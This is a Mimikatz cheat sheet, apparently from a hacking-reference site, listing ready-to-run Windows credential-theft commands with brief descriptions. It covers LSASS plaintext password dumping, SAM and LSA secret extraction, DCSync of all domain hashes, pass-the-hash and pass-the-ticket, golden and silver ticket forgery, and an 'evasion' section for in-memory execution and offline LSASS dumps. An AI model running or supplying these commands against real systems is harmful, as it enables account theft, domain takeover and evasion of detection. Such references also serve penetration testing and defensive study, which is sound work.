Mimikatz — Windows Credential Dumping

Mimikatz extracts plaintext passwords, hashes, PIN codes, and Kerberos tickets from Windows memory.

Apr 2026 lazyhackers
Core Commands (9)
privilege::debug
Get SeDebugPrivilege (required for most ops)
priv debug
token::elevate
Impersonate SYSTEM token
priv system
sekurlsa::logonpasswords
Dump plaintext passwords from LSASS memory
lsass creds plaintext
sekurlsa::wdigest
Dump WDigest credentials (older Windows)
wdigest creds
sekurlsa::pth /user:admin /domain:corp /ntlm:HASH /run:cmd.exe
Pass-the-Hash — spawn cmd as user
pth pass-the-hash
sekurlsa::tickets
List Kerberos tickets in memory
kerberos tickets
sekurlsa::tickets /export
Export all Kerberos tickets to .kirbi files
kerberos tickets export
sekurlsa::ekeys
Dump Kerberos encryption keys (AES keys)
kerberos aes
sekurlsa::dpapi
Dump DPAPI credentials
dpapi creds
SAM & NTDS (6)
lsadump::sam
Dump SAM database local hashes
sam hashes
lsadump::lsa /patch
Dump LSA secrets
lsa secrets
lsadump::dcsync /domain:corp.local /user:Administrator
DCSync — pull hash of specific user
dcsync da
lsadump::dcsync /domain:corp.local /all /csv
DCSync — dump ALL domain hashes to CSV
dcsync all
lsadump::cache
Dump cached domain credentials (MSCache2)
cache creds
lsadump::secrets
Dump LSA secrets (service accounts, etc)
lsa secrets
Kerberos Ticket Attacks (5)
kerberos::list /export
List and export Kerberos tickets
kerberos tickets
kerberos::ptt ticket.kirbi
Pass-the-Ticket — inject .kirbi into session
ptt kerberos
kerberos::golden /user:Administrator /domain:corp.local /sid:S-1-5-21-xxx /krbtgt:HASH /ticket:golden.kirbi
Create Golden Ticket (offline)
golden-ticket kerberos
kerberos::silver /user:Administrator /domain:corp.local /sid:S-1-5-21-xxx /target:server /service:cifs /rc4:HASH /ticket:silver.kirbi
Create Silver Ticket for service
silver-ticket kerberos
kerberos::purge
Delete all Kerberos tickets from memory
kerberos cleanup
Remote & Evasion (4)
invoke-mimikatz -DumpCreds
PowerSploit Invoke-Mimikatz (in-memory, no disk)
powershell invoke evasion
mimikatz.exe "privilege::debug" "sekurlsa::logonpasswords" "exit" > creds.txt
Run Mimikatz non-interactively
cli noninteractive
procdump.exe -ma lsass.exe lsass.dmp
Dump LSASS process with ProcDump (then analyze offline)
lsass dump procdump
mimikatz "sekurlsa::minidump lsass.dmp" "sekurlsa::logonpasswords" "exit"
Analyze offline LSASS dump
lsass minidump offline